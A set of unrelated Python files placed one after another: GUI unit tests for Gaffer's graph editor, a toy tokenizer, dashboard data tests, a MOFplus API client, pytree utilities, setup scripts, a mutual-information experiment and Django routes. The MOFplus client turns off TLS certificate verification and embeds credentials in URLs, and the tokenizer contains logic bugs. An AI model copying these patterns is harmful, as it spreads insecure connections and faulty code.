s["add1"]["op1"].setInput( s["add2"]["sum"] )
g = GafferUI.GraphEditor( s )
self.failUnless( g.graphGadget().nodeGadget( s["add1"] ).node() is s["add1"] )
self.failUnless( g.graphGadget().nodeGadget( s["add2"] ).node() is s["add2"] )
self.failUnless( g.graphGadget().connectionGadget( s["add1"]["op1"] ).dstNodule().plug().isSame( s["add1"]["op1"] ) )
def testGraphGadgetAccess( self ) :
s = Gaffer.ScriptNode()
ge = GafferUI.GraphEditor( s )
g = ge.graphGadget()
self.failUnless( isinstance( g, GafferUI.GraphGadget ) )
def testLifetime( self ) :
s = Gaffer.ScriptNode()
s["n"] = GafferTest.AddNode()
e = GafferUI.GraphEditor( s )
we = weakref.ref( e )
del e
self.assertEqual( we(), None )
def testTitle( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphEditor( s )
self.assertEqual( g.getTitle(), "Graph Editor" )
b1 = Gaffer.Box()
b2 = Gaffer.Box()
s["a"] = b1
s["a"]["b"] = b2
self.__signalUpdatedTitle = g.getTitle()
def titleChangedHandler( widget ) :
self.__signalUpdatedTitle = widget.getTitle()
g.titleChangedSignal().connect( titleChangedHandler, scoped = False )
g.graphGadget().setRoot( b1 )
self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : a" )
g.graphGadget().setRoot( b2 )
self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : a / b" )
b1.setName( "c" )
self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : c / b" )
b2.setName( "d" )
self.assertEqual( self.__signalUpdatedTitle, "Graph Editor : c / d" )
g.setTitle( "This is a test!" )
self.assertEqual( self.__signalUpdatedTitle, "This is a test!" )
def testAutomaticLayout( self ) :
s = Gaffer.ScriptNode()
s["n1"] = GafferTest.AddNode()
s["n2"] = GafferTest.AddNode()
s["n2"]["op1"].setInput( s["n1"]["sum"] )
s["b"] = Gaffer.Box()
s["b"]["n1"] = GafferTest.AddNode()
s["b"]["n2"] = GafferTest.AddNode()
s["b"]["n2"]["op1"].setInput( s["b"]["n1"]["sum"] )
with GafferUI.Window() as w :
graphEditor = GafferUI.GraphEditor( s )
w.setVisible( True )
self.waitForIdle( 10000 )
def assertLower( graphGadget, n1, n2 ) :
self.assertLess( graphGadget.getNodePosition( n1 ).y, graphGadget.getNodePosition( n2 ).y )
self.assertEqual( graphEditor.graphGadget().unpositionedNodeGadgets(), [] )
assertLower( graphEditor.graphGadget(), s["n2"], s["n1"] )
graphEditor.graphGadget().setRoot( s["b"] )
self.waitForIdle( 10000 )
self.assertEqual( graphEditor.graphGadget().unpositionedNodeGadgets(), [] )
assertLower( graphEditor.graphGadget(), s["b"]["n2"], s["b"]["n1"] )
s["b"]["n3"] = GafferTest.AddNode()
s["b"]["n3"]["op1"].setInput( s["b"]["n2"]["sum"] )
self.waitForIdle( 10000 )
self.assertEqual( graphEditor.graphGadget().unpositionedNodeGadgets(), [] )
assertLower( graphEditor.graphGadget(), s["b"]["n3"], s["b"]["n2"] )
def testRootReparenting( self ) :
# This test deliberately keeps b alive to mimic
# the effects of an UndoScope or similar.
s = Gaffer.ScriptNode()
e = GafferUI.GraphEditor( s )
b = Gaffer.Box()
s["b"] = b
e.graphGadget().setRoot( b )
self.assertEqual( e.graphGadget().getRoot(), b )
s.removeChild( b )
self.assertEqual( e.graphGadget().getRoot(), s )
s["b"] = b
b["bb"] = Gaffer.Box()
e.graphGadget().setRoot( b["bb"] )
self.assertEqual( e.graphGadget().getRoot(), b["bb"] )
s.removeChild( b )
self.assertEqual( e.graphGadget().getRoot(), s )
# Test with actually deleted nodes too
s["b"] = b
e.graphGadget().setRoot( b["bb"] )
self.assertEqual( e.graphGadget().getRoot(), b["bb"] )
del b
del s["b"]
self.assertEqual( e.graphGadget().getRoot(), s )
if __name__ == "__main__":
unittest.main()
|
from enum import Enum
string = """proc main() -> unit {
print("Hello World!")
}"""
class TokenKind(Enum):
NOUN = 1
LBRACE = 2
RBRACE = 3
ARROW = 4
LCURLY = 5
RCURLY = 6
STRING = 7
MINUS = 8
STRING = 9
class Token:
def __init__(self, line, pos, kind, contents):
self.line = line
self.pos = pos
self.kind = kind
self.contents = contents
def forward(s, start, last):
return s[start : last + 1]
def tokenizer(program):
limit = len(program) - 1
idx = 0
line = 1
pos = 0
tokens = []
while idx <= limit:
char = program[idx]
if char == " ":
idx += 1
pos += 1
elif char.isalpha():
start = idx
last = idx + 1
string = forward(program, start, last)
while string[-1].isalpha() or string[-1] == "_":
if last + 1 <= limit:
last += 1
string = forward(program, start, last)
if not (string[-1].isalpha() or string[-1] == "_"):
last -= 1
break
else:
break
string = string[:-1]
tokens.append(Token(line, pos, TokenKind.NOUN, string))
idx = last + 1
pos = last + 1
elif char == "(":
tokens.append(Token(line, pos, TokenKind.LBRACE, "("))
idx += 1
pos += 1
elif char == ")":
tokens.append(Token(line, pos, TokenKind.RBRACE, ")"))
idx += 1
pos += 1
elif char == "-":
if program[idx + 1] == ">":
tokens.append(Token(line, pos, TokenKind.ARROW, "->"))
idx += 2
pos += 2
else:
tokens.append(Token(line, pos, TokenKind.MINUS, "-"))
idx += 1
pos += 1
elif char == "{":
tokens.append(Token(line, pos, TokenKind.LCURLY, "{"))
idx += 1
pos += 1
elif char == "}":
tokens.append(Token(line, pos, TokenKind.RCURLY, "}"))
idx += 1
pos += 1
elif char == "\n":
idx += 1
pos = 0
elif char == '"' or "'":
start = idx
last = idx + 1
string = forward(program, start, last)
while string[-1] != ('"' or "'"):
if last + 1 <= limit:
last += 1
string = forward(program, start, last)
else:
break
tokens.append(Token(line, pos, TokenKind.STRING, string[1:-1]))
idx = last + 1
pos = last + 1
else:
print(f"unknown char {char}")
break
return tokens
|
"""
Tests for the data_download module
Includes three tests for the each of the two data functions
"""
import unittest
from detention_data_dashboard.data_download import *
class TestDashboard(unittest.TestCase):
"""
create class for unittests
"""
def test_smoke_data1(self):
"""
Simple smoke test to make sure the data downloaded is a dataframe
"""
fob = data_download_reg("West Coast")
self.assertTrue(str(type(fob)) == "<class 'pandas.core.frame.DataFrame'>")
def test_edge_data1(self):
"""
Edge test to make sure data will not download if given bad inputs
"""
with self.assertRaises(NameError):
data_download_reg("jumping_jacks")
def test_pattern_data1(self):
"""
Pattern test for data to make sure download has the correct information included
(eg correct number of rows and columns)
"""
for location in ["East Coast", "West Coast", "Southwest", "Midwest", "All"]:
fob = data_download_reg(location)
self.assertTrue(fob.shape == (4, 4))
def test_smoke_data2(self):
"""
Simple smoke test to make sure the data downloaded is a dataframe
"""
fob = data_download_arrests_aor("LOS")
self.assertTrue(str(type(fob)) == "<class 'pandas.core.frame.DataFrame'>")
def test_edge_data2(self):
"""
Edge test to make sure data will not download if given bad inputs
"""
with self.assertRaises(NameError):
data_download_arrests_aor("jumping_jacks")
def test_pattern_data2(self):
"""
Pattern test for data to make sure download has the correct information included
(eg correct number of rows and columns)
"""
for location in ['ATL', 'BAL', 'BOS', 'BUF', 'CHI', 'DAL', 'DEN', 'DET', 'ELP',
'HOU', 'HQ', 'LOS', 'MIA', 'NEW', 'NOL','NYC', 'PHI', 'PHO',
'SEA', 'SFR', 'SLC', 'SNA', 'SND', 'SPM', 'WAS']:
fob = data_download_arrests_aor(location)
self.assertTrue(fob.shape == (4, 2))
def test_smoke_data3(self):
"""
Simple smoke test to make sure the data downloaded is a dataframe
"""
fob = data_download_ice_detention()
self.assertTrue(str(type(fob)) == "<class 'pandas.core.frame.DataFrame'>")
def test_pattern_data3(self):
"""
Pattern test for data to make sure download has the correct information included
(eg correct number of rows and columns)
"""
fob = data_download_ice_detention()
self.assertTrue(fob.shape == (100, 7))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import xmlrpc.client
import ssl
# try to use xmlrpxlibex from https://github.com/benhengx/xmlrpclibex (install with pip3 install xmlrpclibex)
try:
from xmlrpclibex import xmlrpclibex
can_use_socks = True
except ImportError:
can_use_socks = False
import logging
import sys
import os
import re
import molsys
import getpass
from .decorator import faulthandler, download
logger = logging.getLogger("mofplus")
logger.setLevel(logging.DEBUG)
shandler = logging.StreamHandler()
shandler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m-%d %H:%M')
shandler.setFormatter(formatter)
logger.addHandler(shandler)
default_excepthook = sys.excepthook
def custom_excepthook(etype, value, tb):
"""
Prevents username and password printed in stderr
Arg:
etype: exception class
value: exception instance
tb: traceback object
"""
if etype is xmlrpc.client.ProtocolError:
pattern = 'ProtocolError for .*:.*@www.mofplus.org'
replace = 'ProtocolError for <USERNAME>:<PW>@www.mofplus.org'
value.url = re.sub(pattern,replace,value.url)
default_excepthook(etype, value, tb)
sys.excepthook = custom_excepthook
class user_api(object):
"""Basic API class to talk to MOFplus
Via the user_api class the API routines of MOFplus which are accessible for normal users and do not affect
FF parameters can be used.
Args:
banner (bool, optional): If True, the MFP API banner is printed to SDTOUT, defaults to False
api (string, optional): API to connect to, defaults to "user", can be "admin"
"""
def __init__(self, banner = False, api="user"):
assert api in ["user", "admin"]
if banner: self._print_banner()
try:
logger.info("Get credentials from .mofplusrc")
self.username, self.pw = self._credentials_from_rc()
except IOError:
try:
logger.warning(".mofplusrc not found!")
logger.info("Get credentials from environment variables")
self.username = os.environ['MFPUSER']
self.pw = os.environ['MFPPW']
except KeyError:
logger.warning("Environment credentials not found!")
logger.info("Get credentials from prompt")
self.username, self.pw = self._credentials_from_cmd()
### read from environment variables to which DB should be connected, default is the global www.mofplus.org
if api == "admin":
logger.info("CONNECTING TO ADMIN API")
### if MFPDB is set then we connect to localhost
if 'MFPDB' in os.environ:
self.location = "LOCAL"
MFPDBname = os.environ['MFPDB']
else:
self.location = 'GLOBAL'
# now open the connection
if self.location == 'LOCAL':
# if we are using a local version and can_use_socks is true then check if MFP_PRXY settings are present
if can_use_socks and 'MFP_PRXY_IP' in os.environ:
proxy = {
'host' : os.environ["MFP_PRXY_IP"],
'port' : '8080',
# 'username' : os.environ["MFP_PRXY_USR"],
# 'password' : os.environ["MFP_PRXY_PWD"],
'is_socks' : True,
'socks_type' : 'v5',
}
logger.info('Trying to connect to local MOFplus API at localhost/%s via proxy at %s' % (MFPDBname, proxy['host']))
self.mfp = xmlrpclibex.ServerProxy(
'http://%s:%s@localhost/%s/API/%s/xmlrpc' % (self.username, self.pw, MFPDBname, api),
timeout = 30,
proxy = proxy
)
else:
logger.info('Trying to connect to local MOFplus API at localhost/%s' % MFPDBname)
self.mfp = xmlrpc.client.ServerProxy('http://%s:%s@localhost/%s/API/%s/xmlrpc' % (self.username, self.pw, MFPDBname, api))
else:
logger.info('Trying to connect to global MOFplus API')
self.mfp = xmlrpc.client.ServerProxy('https://%s:%s@www.mofplus.org/API/%s/xmlrpc' % (self.username, self.pw, api),
allow_none = True, context = ssl._create_unverified_context())
self._check_connection(api)
return
def _credentials_from_rc(self):
"""
Method to get the credentials from ~/.mofplusrc
Returns:
username (str): username of current user
pw (str): pw of current user
"""
mprc_filename = os.environ["HOME"]+'/.mofplusrc'
with open(mprc_filename, 'r') as mprc:
username = mprc.readline().split()[0]
pw = mprc.readline().split()[0]
return username, pw
def _credentials_from_cmd(self):
"""
Method to get the credentials from the command line
Returns:
username (str): username of current user
pw (str): pw of current user
"""
username = input("Email:")
pw = getpass.getpass()
return username, pw
def _check_connection(self, api):
"""
Method to check if the connection to MFP is alive
Raises:
IOError: If connections is not possible
"""
try:
self.mfp.add(2,2)
logger.info("Connection to %s API established" % api)
if api == "admin":
print("""
We trust you have received the usual lecture from the MOF+ system administrator.
It usually boils down to these two things:
#1) Think before you type.
#2) With great power comes great responsibility.
""")
except xmlrpc.client.ProtocolError:
logger.error("Not possible to connect to MOF+ %s API. Check your credentials" % api)
raise IOError
return
def _print_banner(self):
"""
Prints the MFP banner
"""
print(":##::::'##::'#######::'########:::::::::::::::'###::::'########::'####:\n\
:###::'###:'##.... ##: ##.....::::'##::::::::'## ##::: ##.... ##:. ##::\n\
:####'####: ##:::: ##: ##::::::::: ##:::::::'##:. ##:: ##:::: ##:: ##::\n\
:## ### ##: ##:::: ##: ######:::'######::::'##:::. ##: ########::: ##::\n\
:##. #: ##: ##:::: ##: ##...::::.. ##.::::: #########: ##.....:::: ##::\n\
:##:.:: ##: ##:::: ##: ##::::::::: ##:::::: ##.... ##: ##::::::::: ##::\n\
:##:::: ##:. #######:: ##:::::::::..::::::: ##:::: ##: ##::::::::'####:\n\
:..:::::..:::.......:::..:::::::::::::::::::..:::::..::..:::::::::....:")
@download('topology')
def get_net(self,netname, out = 'file'):
"""
Downloads a topology in mfpx file format
Parameters:
netname (str): name of the net
out (str,optional): if 'file', mfpx file is written to file,
if 'mol' mol object is returned, if 'str' data is returned
as string, defaults to 'hdd'
"""
lines = self.mfp.get_net(netname)
return lines
def get_list_of_nets(self):
"""
Returns a list of all topologies stored at MOFplus.
"""
return self.mfp.get_list_of_nets()
def get_list_of_bbs(self):
"""
Returns a list of all building blocks stored at MOFplus.
"""
return self.mfp.get_list_of_bbs()
@download('building block')
def get_bb(self,bbname, out = 'file'):
"""
Downloads a building block in mfpx file format
Parameters:
bbname (str): name of the bb
out (str,optional): if 'file', mfpx file is written to file,
if 'mol' mol object is returned, if 'str' data is returned
as string, defaults to 'hdd'
"""
lines = self.mfp.get_bb(bbname)
return lines
@download('MOF')
def get_mof_structure_by_id(self,strucid, out='file'):
"""
Downloads a MOF structure in mfpx file format
Parameters:
strucid (str): id of the MOF structure in the DB
out (str,optional): if 'file', mfpx file is written to file,
if 'mol' mol object is returned, if 'str' data is returned
as string, defaults to 'hdd'
"""
lines,name = self.mfp.get_mof_structure_by_id(strucid)
return lines
def get_cs(self,name):
"""
Returns the coordinations sequences of a topology as a list of lists.
Parameters:
name (str): Name of the topology
"""
return self.mfp.get_cs(name)
def get_vs(self,name):
"""
Returns the vertex symbol of a topology as a list of strings.
Parameters:
name (str): Name of the topology
"""
return self.mfp.get_vs(name)
def search_cs(self, cs, vs, cfilter = True):
"""
Searches nets with a given coordination sequences and given vertex symbols and returns
the corresponding netnames as a list of strings.
Parameters:
cs (list): List of the coordination sequences
vs (list): List of the vertex symbols
cfilter (bool): If True no catenated nets are returned, defaults to True
"""
assert type(cs) == list
assert type(vs) == list
nets = self.mfp.search_cs(cs, vs)
rl = []
if cfilter:
for i,n in enumerate(nets):
if n.find('-c') != -1: rl.append(n)
for i in rl: nets.remove(i)
return nets
@download('topology')
def get_scaledtopo(self,id, out = 'file'):
"""
Gets the scaled topo file for a given supercell id.
Parameters:
id(int): if of the supercell entry in the db for which
the scaledtopo is requested
out (str,optional): if 'file', mfpx file is written to file,
if 'mol' mol object is returned, if 'str' data is returned
as string, defaults to 'hdd'
"""
lines = self.mfp.get_scaledtopo(id)
return lines
@download('orients')
def get_orients(self,id):
"""
Gets the orients file for a given supercell id.
Parameters:
id(int): id of the supercell entry in the db for which
the orients file is requested
"""
lines = self.mfp.get_orients(id)
return lines
|
from typing import NamedTuple, Callable, Any, Tuple, List, Dict, Type, cast, Optional
"""
Contains utility functions for working with nested python data structures.
A *pytree* is Python nested data structure. It is a tree in the sense that
nodes are Python collections (e.g., list, tuple, dict) and the leaves are
Python values. Furthermore, a pytree should not contain reference cycles.
pytrees are useful for working with nested collections of Tensors. For example,
one can use `tree_map` to map a function over all Tensors inside some nested
collection of Tensors and `tree_unflatten` to get a flat list of all Tensors
inside some nested collection. pytrees are helpful for implementing nested
collection support for PyTorch APIs.
This pytree implementation is not very performant due to Python overhead
To improve the performance we can move parts of the implementation to C++.
"""
# A NodeDef holds two callables:
# - flatten_fn should take the collection and return a flat list of values.
# It can also return some context that is used in reconstructing the
# collection.
# - unflatten_fn should take a flat list of values and some context
# (returned by flatten_fn). It returns the collection by reconstructing
# it from the list and the context.
Context = Any
PyTree = Any
FlattenFunc = Callable[[PyTree], Tuple[List, Context]]
UnflattenFunc = Callable[[List, Context], PyTree]
class NodeDef(NamedTuple):
flatten_fn: FlattenFunc
unflatten_fn: UnflattenFunc
SUPPORTED_NODES: Dict[Type[Any], NodeDef] = {}
def _register_pytree_node(typ: Any, flatten_fn: FlattenFunc, unflatten_fn: UnflattenFunc) -> None:
SUPPORTED_NODES[typ] = NodeDef(flatten_fn, unflatten_fn)
def _dict_flatten(d: Dict[Any, Any]) -> Tuple[List[Any], Context]:
return list(d.values()), list(d.keys())
def _dict_unflatten(values: List[Any], context: Context) -> Dict[Any, Any]:
return {key: value for key, value in zip(context, values)}
def _list_flatten(d: List[Any]) -> Tuple[List[Any], Context]:
return d, None
def _list_unflatten(values: List[Any], context: Context) -> List[Any]:
return list(values)
def _tuple_flatten(d: Tuple[Any, ...]) -> Tuple[List[Any], Context]:
return list(d), None
def _tuple_unflatten(values: List[Any], context: Context) -> Tuple[Any, ...]:
return tuple(values)
_register_pytree_node(dict, _dict_flatten, _dict_unflatten)
_register_pytree_node(list, _list_flatten, _list_unflatten)
_register_pytree_node(tuple, _tuple_flatten, _tuple_unflatten)
# A leaf is defined as anything that is not a Node.
def _is_leaf(pytree: PyTree) -> bool:
return type(pytree) not in SUPPORTED_NODES.keys()
# A TreeSpec represents the structure of a pytree. It holds:
# "type": the type of root Node of the pytree
# context: some context that is useful in unflattening the pytree
# children_specs: specs for each child of the root Node
# num_leaves: the number of leaves
class TreeSpec:
def __init__(self, typ: Any, context: Context, children_specs: List['TreeSpec']) -> None:
self.type = typ
self.context = context
self.children_specs = children_specs
self.num_leaves: int = sum([spec.num_leaves for spec in children_specs])
def __repr__(self) -> str:
return f'TreeSpec({self.type.__name__}, {self.context}, {self.children_specs})'
def __eq__(self, other: Any) -> bool:
result = self.type == other.type and self.context == other.context \
and self.children_specs == other.children_specs \
and self.num_leaves == other.num_leaves
# This should really not be necessary, but mypy errors out without it.
return cast(bool, result)
def __ne__(self, other: Any) -> bool:
return not self.__eq__(other)
class LeafSpec(TreeSpec):
def __init__(self) -> None:
super().__init__(None, None, [])
self.num_leaves = 1
def __repr__(self) -> str:
return '*'
def tree_flatten(pytree: PyTree) -> Tuple[List[Any], TreeSpec]:
"""Flattens a pytree into a list of values and a TreeSpec that can be used
to reconstruct the pytree.
"""
if _is_leaf(pytree):
return [pytree], LeafSpec()
flatten_fn = SUPPORTED_NODES[type(pytree)].flatten_fn
child_pytrees, context = flatten_fn(pytree)
# Recursively flatten the children
result : List[Any] = []
children_specs : List['TreeSpec'] = []
for child in child_pytrees:
flat, child_spec = tree_flatten(child)
result += flat
children_specs.append(child_spec)
return result, TreeSpec(type(pytree), context, children_specs)
def tree_unflatten(values: List[Any], spec: TreeSpec) -> PyTree:
"""Given a list of values and a TreeSpec, builds a pytree.
This is the inverse operation of `tree_flatten`.
"""
if not isinstance(spec, TreeSpec):
raise ValueError(
f'tree_unflatten(values, spec): Expected `spec` to be instance of '
f'TreeSpec but got item of type {type(spec)}.')
if len(values) != spec.num_leaves:
raise ValueError(
f'tree_unflatten(values, spec): `values` has length {len(values)} '
f'but the spec refers to a pytree that holds {spec.num_leaves} '
f'items ({spec}).')
if isinstance(spec, LeafSpec):
return values[0]
unflatten_fn = SUPPORTED_NODES[spec.type].unflatten_fn
# Recursively unflatten the children
start = 0
end = 0
child_pytrees = []
for child_spec in spec.children_specs:
end += child_spec.num_leaves
child_pytrees.append(tree_unflatten(values[start:end], child_spec))
start = end
return unflatten_fn(child_pytrees, spec.context)
# Broadcasts a pytree to the provided TreeSpec and returns the flattened
# values. If this is not possible, then this function returns None.
#
# For example, given pytree=0 and spec=TreeSpec(list, None, [LeafSpec(), LeafSpec()]),
# would return [0, 0]. This is useful for part of the vmap implementation:
# a user can pass in vmap(fn, in_dims)(*inputs). `in_dims` should be
# broadcastable to the tree structure of `inputs` and we use
# _broadcast_to_and_flatten to check this.
def _broadcast_to_and_flatten(pytree: PyTree, spec: TreeSpec) -> Optional[List[Any]]:
assert isinstance(spec, TreeSpec)
if _is_leaf(pytree):
return [pytree] * spec.num_leaves
if isinstance(spec, LeafSpec):
return None
if type(pytree) != spec.type:
return None
flatten_fn = SUPPORTED_NODES[type(pytree)].flatten_fn
child_pytrees, ctx = flatten_fn(pytree)
# Check if the Node is different from the spec
if len(child_pytrees) != len(spec.children_specs) or ctx != spec.context:
return None
# Recursively flatten the children
result : List[Any] = []
for child, child_spec in zip(child_pytrees, spec.children_specs):
flat = _broadcast_to_and_flatten(child, child_spec)
if flat is not None:
result += flat
else:
return None
return result
|
__author__ = 'Suyash Soni'
__email__ = 'suyash.soni248@gmail.com'
import os
from setuptools import setup, find_packages
from src.conf.settings import VERSION
def curr_version():
py_repo = os.environ['PY_REPO']
version = VERSION[py_repo]
print('[SETUP] Preparing sqlalchemy_json_querybuilder-{version} to upload to {py_repo}'.format(
version=version, py_repo=py_repo
))
return version
setup(
name='sqlalchemy_json_querybuilder',
version=curr_version(),
author='Suyash Soni',
author_email='suyash.soni248@gmail.com',
maintainer="Suyash Soni",
description='Querybuilder to use SqlAlchemy ORM by feeding JSON/object as input',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
url='https://github.com/suyash248/sqlalchemy-json-querybuilder',
packages=find_packages('lib'),
package_dir={
'': 'lib'
},
python_requires='>=3',
install_requires=[
'sqlalchemy'
],
classifiers=[
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3'
]
) |
#import tensorflow as tf
import matplotlib
matplotlib.use('Agg')
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append("..")
from gaussian_dataset import generate_dataset
from simple_mine_refact import SimpleMINE
from grad_corrected_mine import GradMINE
from simple_mine_f import MINEf
import time
import datetime
# Name
date = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
# Dataset params
dimension = 180
corr_factors = [0, 0.1, 0.3, 0.5, 0.7, 0.9, 0.99]#[0, 0.3, 0.99]
corr_neg = [-corr for corr in corr_factors][::-1]
corr_factor_ls = corr_neg[0:len(corr_neg)-1]+corr_factors
n_samples_train = 100000
n_samples_test = 30000
name = date + "_all_MINE_" + str(dimension)
# Model params
params = {
"batch_size": 256,
"learning_rate": 1e-4,
"input_dim": dimension,
"ema_decay": 0.999
}
# Train params
max_it = 80000
stat_every = 10000
# To build list
theoric_I = []
estimated_I = []
estimated_I_grad = []
estimated_I_f = []
#%%
for i in range(len(corr_factor_ls)):
# Data set
inputs_x, inputs_z, _ = generate_dataset(dimension, corr_factor_ls[i], n_samples_train)
test_inputs_x, test_inputs_z, mut_info = generate_dataset(dimension, corr_factor_ls[i], n_samples_test)
test_inputs_z_hat = np.copy(test_inputs_z)
np.random.shuffle(test_inputs_z_hat)
print("Mutual Information for %ith test dataset is: %s" % (i,str(mut_info)))
theoric_I.append(mut_info)
# Models
model = SimpleMINE(params)
# Train
try:
model.train(inputs_x, inputs_z, max_it, stat_every)
except Exception as e:
print("type error: " + str(e))
pass
print("Mutual Information for %ith test dataset is: %s" % (i,str(mut_info)))
try:
test_I = model.sess.run(model.loss, feed_dict={model.x: test_inputs_x, model.z: test_inputs_z, model.z_hat: test_inputs_z_hat})
except Exception as e:
print("type error: " + str(e))
pass
# Models
model_grad = GradMINE(params)
# Train
try:
model_grad.train(inputs_x, inputs_z, max_it, stat_every)
except Exception as e:
print("type error: " + str(e))
pass
try:
test_I_grad = model_grad.sess.run(model_grad.loss, feed_dict={model_grad.x: test_inputs_x, model_grad.z: test_inputs_z, model_grad.z_hat: test_inputs_z_hat})
except Exception as e:
print("type error: " + str(e))
pass
# Models
model_f = MINEf(params)
# Train
try:
model_f.train(inputs_x, inputs_z, max_it, stat_every)
except Exception as e:
print("type error: " + str(e))
pass
try:
test_I_f = model_f.sess.run(model_f.loss, feed_dict={model_f.x: test_inputs_x, model_f.z: test_inputs_z, model_f.z_hat: test_inputs_z_hat})
except Exception as e:
print("type error: " + str(e))
pass
print("Estimated Simple Mutual Information for %ith test dataset is: %s" % (i,str(test_I)))
print("Estimated Grad Mutual Information for %ith test dataset is: %s" % (i,str(test_I_grad)))
print("Estimated f Mutual Information for %ith test dataset is: %s" % (i, str(test_I_f)))
estimated_I.append(test_I)
estimated_I_grad.append(test_I_grad)
estimated_I_f.append(test_I_f)
#%%
print("IM teorica")
print(theoric_I)
print("IM simple MINE")
print(estimated_I)
print("IM grad MINE")
print(estimated_I_grad)
print("IM MINE_f")
print(estimated_I_f)
print("IM teorica", flush=True, file=open('results/'+name+'_train.log', 'a'))
print(theoric_I, flush=True, file=open('results/'+name+'_train.log', 'a'))
print("IM simple MINE", flush=True, file=open('results/'+name+'_train.log', 'a'))
print(estimated_I, flush=True, file=open('results/'+name+'_train.log', 'a'))
print("IM grad MINE", flush=True, file=open('results/'+name+'_train.log', 'a'))
print(estimated_I_grad, flush=True, file=open('results/'+name+'_train.log', 'a'))
print("IM MINE_f", flush=True, file=open('results/'+name+'_train.log', 'a'))
print(estimated_I_f, flush=True, file=open('results/'+name+'_train.log', 'a'))
#%%
#import matplotlib
#matplotlib.use('Agg')
#import numpy as np
#import matplotlib.pyplot as plt
# Create plots with pre-defined labels.
#dimension = 20
#name = "all_mine"
#corr_factors = [0, 0.1, 0.3, 0.5, 0.7, 0.9, 0.99]#[0, 0.3, 0.99]
#corr_neg = [-corr for corr in corr_factors][::-1]
#corr_factor_ls = corr_neg[0:len(corr_neg)-1]+corr_factors
#theoric_I = [39.170355472516874, 16.607312068216512, 6.733445532637656, 2.8768207245178083, 0.9431067947124133, 0.10050335853501455, -0.0, 0.10050335853501455, 0.9431067947124133, 2.8768207245178083, 6.733445532637656, 16.607312068216512, 39.170355472516874]
#estimated_I = [np.nan, np.nan, np.nan, 2.3143282, 0.8775661, 0.069535024, -0.026147725, 0.07246518, 0.86943215, 2.5712926, np.nan, np.nan, np.nan]
#estimated_I_grad = [4.4733887, 2.7001667, 6.024006, 2.699387, 0.8863009, 0.074488044, -0.021217227, 0.07841396, 0.86781573, 2.5571303, 5.5366993, 11.926083, 13.178387]
#estimated_I_f = [18.260582, 12.114112, 3.2008615, 2.779146, 0.8839741, 0.07127565, -0.023192942, 0.076206625, 0.8925297, 2.5285978, 6.1364875, 11.3494215, 19.390987]
#dimension=180
#IM teorica
#[352.53319925265197, 149.4658086139486, 60.60100979373875, 25.89138652066023, 8.48796115241175, 0.9045302268151266, -0.0, 0.9045302268151266, 8.48796115241175, 25.89138652066023, 60.60100979373875, 149.4658086139486, 352.53319925265197]
#IM simple MINE
#[nan, nan, nan, nan, 2.0991511, -0.0598675, -0.30358177, -0.06523633, 1.5352504, nan, nan, nan, nan]
#IM grad MINE
#[nan, 3.0846558, 8.46356, 5.5037537, 2.1676087, 0.013367176, -0.28315628, 0.02129507, 2.3358266, 4.492078, 5.1288576, 7.180626, nan]
#IM MINE_f
#[15.281321, 14.355327, 3.0857368, 3.2455711, 1.9532733, -0.027747154, -0.2884177, -0.016965985, 2.1113505, 2.9029574, 7.950784, 6.2512007, 12.364767]
fig, ax = plt.subplots()
ax.plot(corr_factor_ls, theoric_I, 'b--', label='True MI')
ax.plot(corr_factor_ls, estimated_I_f, 'g*')
ax.plot(corr_factor_ls, estimated_I_f, 'g-', label='MINE_f MI')
ax.plot(corr_factor_ls, estimated_I_grad, 'r-', label='Grad MINE')
ax.plot(corr_factor_ls, estimated_I_grad, 'r*')
ax.plot(corr_factor_ls, estimated_I, 'b-', label='Simple MINE')
ax.plot(corr_factor_ls, estimated_I, 'b*')
ax.set_ylabel(r'$I(X_a;X_b)$', fontsize=15)
ax.set_xlabel(r'$\rho$', fontsize=15)
ax.set_title('Mutual Information of %i-dimensional variables' % (dimension))
ax.grid(True)
legend = ax.legend(loc='upper center', shadow=True, fontsize='x-large')
# Put a nicer background color on the legend.
legend.get_frame().set_facecolor('#00FFCC')
fig.tight_layout()
fig.savefig('results/'+name+'.png', bbox_inches='tight')
#plt.show()
|
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from .core import views
router = routers.DefaultRouter()
router.register(r'orders', views.OrderViewSet)
router.register(r'products', views.ProductViewSet)
# router.register(r'productorders', views.ProductOrderViewSet)
urlpatterns = [
path('', views.index, name='index'),
path('orders/',
views.OrderListView.as_view(), name='order'),
path('orders/<int:pk>/',
views.OrderUpdateView.as_view(), name='order-update'),
path('orders/<int:pk>/delete',
views.OrderDeleteView.as_view(), name='order-delete'),
path('orders/<int:pk>/checkout/',
views.OrderStatusToPendingView.as_view(), name='order-checkout'),
path('orders/<int:pk>/dispatch/',
views.OrderStatusToDispatchedView.as_view(), name='order-dispatch'),
path('orders/<int:pk>/items/<int:item_pk>',
views.OrderItemUpdateView.as_view(), name='order-item-update'),
path('orders/<int:pk>/items/<int:item_pk>/delete',
views.OrderItemDeleteView.as_view(), name='order-item-delete'),
path('products/',
views.ProductListView.as_view(), name='product'),
path('products/add',
views.ProductCreateView.as_view(), name='product-create'),
path('products/<int:pk>',
views.ProductUpdateView.as_view(), name='product-update'),
path('products/<int:pk>/delete',
views.ProductDeleteView.as_view(), name='product-delete'),
path('admin/', admin.site.urls),
path('accounts/', include('django.contrib.auth.urls')),
path('api/', include(router.urls)),
]
|
from setuptools import setup
project_name = 'requests-ntlm2'
# PyPi supports only reStructuredText, so pandoc should be installed
# before uploading package
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except ImportError:
long_description = ''
requires = [
"requests == 2.5.0",
"ntlmlib >= 0.72"
]
setup(
name=project_name,
version=0.01,
description='Python library to use Requests NTLMv1 or NTLMv2',
long_description=long_description,
keywords='requests ntlm ntlmv2 ntlmv1 http'.split(' '),
author='Ian Clegg',
author_email='ian.clegg@sourcewarp.com',
url='https://github.com/ianclegg/',
license='MIT license',
packages=['requests_ntlm2'],
install_requires=requires,
classifiers=[
'Development Status :: 3 - Alpha',
